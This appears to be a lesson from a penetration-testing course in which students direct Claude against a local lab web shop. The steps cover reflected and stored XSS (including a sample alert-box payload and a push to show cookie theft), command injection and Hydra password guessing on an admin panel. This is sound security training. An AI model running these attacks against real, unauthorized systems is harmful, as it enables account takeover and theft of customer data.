Step 1: Test for Reflected XSS
Open materials/ttp-selection.md and find the reflected XSS entry. The target is any input that gets reflected back in the page response -- the search bar is the most obvious candidate.
Direct Claude to test:
Test the search functionality at http://localhost:8080/search.php for reflected XSS. Try injecting a basic script payload through the search parameter and check if the input is reflected in the page without encoding.
If Claude demonstrates with <script>alert(1)</script> and stops there, that confirms the vector exists but does not show the impact. An alert box proves the browser will execute arbitrary JavaScript. What matters for Ruta's customers is what an attacker could do with that execution -- access session tokens, read cookies, redirect to a fake payment page.
Push for impact demonstration:
The alert box confirms the XSS vector. Now demonstrate the actual impact -- show that an attacker could access session cookies or tokens through this vulnerability. What could an attacker steal from a customer who clicks a crafted link?
AI commonly defaults to the alert-box proof of concept because it is technically sufficient for confirming the vulnerability. Professionally, a finding without impact demonstration is a half-finished finding. The severity difference between "JavaScript executes" and "an attacker can steal customer session tokens" is the difference between a medium-priority note and a high-priority fix.
Step 2: Test for Stored XSS
Stored XSS is a different animal. Reflected XSS requires a crafted link -- someone has to click it. Stored XSS persists in the database and executes for every visitor who loads the page.
The product review system is the target. Direct Claude to submit a review containing a script payload:
Submit a product review on one of the amber jewelry product pages at http://localhost:8080/product.php that contains an XSS payload. Then load the product page in a fresh context to confirm the payload persists and executes for any visitor.
If the payload executes on page load, every customer browsing that product would have the script running in their browser. For Ruta's shop serving customers in 15 countries, a stored XSS in the product reviews means every visitor to that page is a potential victim -- not just someone who clicked a specific link.
This is why the TTP selection ranks stored XSS as higher priority than reflected. The blast radius is the entire audience of that page, not a single targeted click.
Step 3: Test for Command Injection
Command injection is a different category entirely. XSS runs in the customer's browser. Command injection runs on the server itself.
Look at the reconnaissance data from Unit 2. Any endpoint that processes user input through server-side utilities -- file handling, export features, order processing -- is a candidate. Direct Claude to test:
Test for command injection on server-side endpoints that process user input. Look at the order processing or file handling functionality. Try payloads that would execute system commands if the input is passed to a shell.
If command injection succeeds, the attacker has access to the operating system. They could read the database credentials from the configuration file, list the contents of the server, or install persistent access. The impact is fundamentally different from XSS -- this compromises the server, not the customer's browser.
Task-sizing matters here. Directing Claude to "test for all vulnerabilities at once" produces worse results than focusing on one type at a time. Each vulnerability type requires a different approach, different payloads, and different interpretation of results. Keep the requests focused.
Step 4: Test Credentials with Hydra
The admin login panel is the target. Hydra is a new tool -- it automates credential testing against login forms by trying username/password combinations from a wordlist.
Direct Claude to run Hydra against the admin login:
Use Hydra to test for weak credentials on the admin login at http://localhost:8080/admin/. Use a small targeted wordlist focusing on common defaults -- admin/admin, admin/password, admin/123456. Report what Hydra finds and how many attempts it took.
Hydra's output reports found credentials in a specific format. AI will present a successful find as definitive -- "the admin password is admin." Check the output yourself. A successful credential find against a default username on an admin panel is significant for Ruta's shop. If anyone on the internet can log into the admin panel with admin/admin, they have access to customer data, order history, and the ability to modify the shop.
Consider what this means in context. Ruta's nephew Tomas set up the admin account when he was building the shop as a student. Whether he changed the default password determines the severity. The tool finding is one thing. The business impact for a shop storing customer addresses in 15 countries is another.
Step 5: Document All Findings
You now have multiple confirmed findings across different vulnerability types. Each one has a different impact, a different exploitation method, and will need a different detection rule in the next unit.
Direct Claude to compile the findings:
Document each confirmed finding with: the vulnerability type, the specific endpoint tested, the exploitation method, the evidence collected, the impact assessment specific to Ruta's shop and customers, and the ATT&CK technique mapping from the TTP selection document.
Each finding should stand on its own. A finding without reproduction steps cannot survive peer review. A finding without impact assessment cannot be prioritized. A finding without ATT&CK mapping cannot be contextualized within a broader threat model.
This documentation is the input for the next three units: detection rules, remediation, and the final report. What you collect now determines what you can deliver later.
✓ Check: At least two different vulnerability types confirmed with evidence. Each finding has an impact assessment beyond "vulnerable."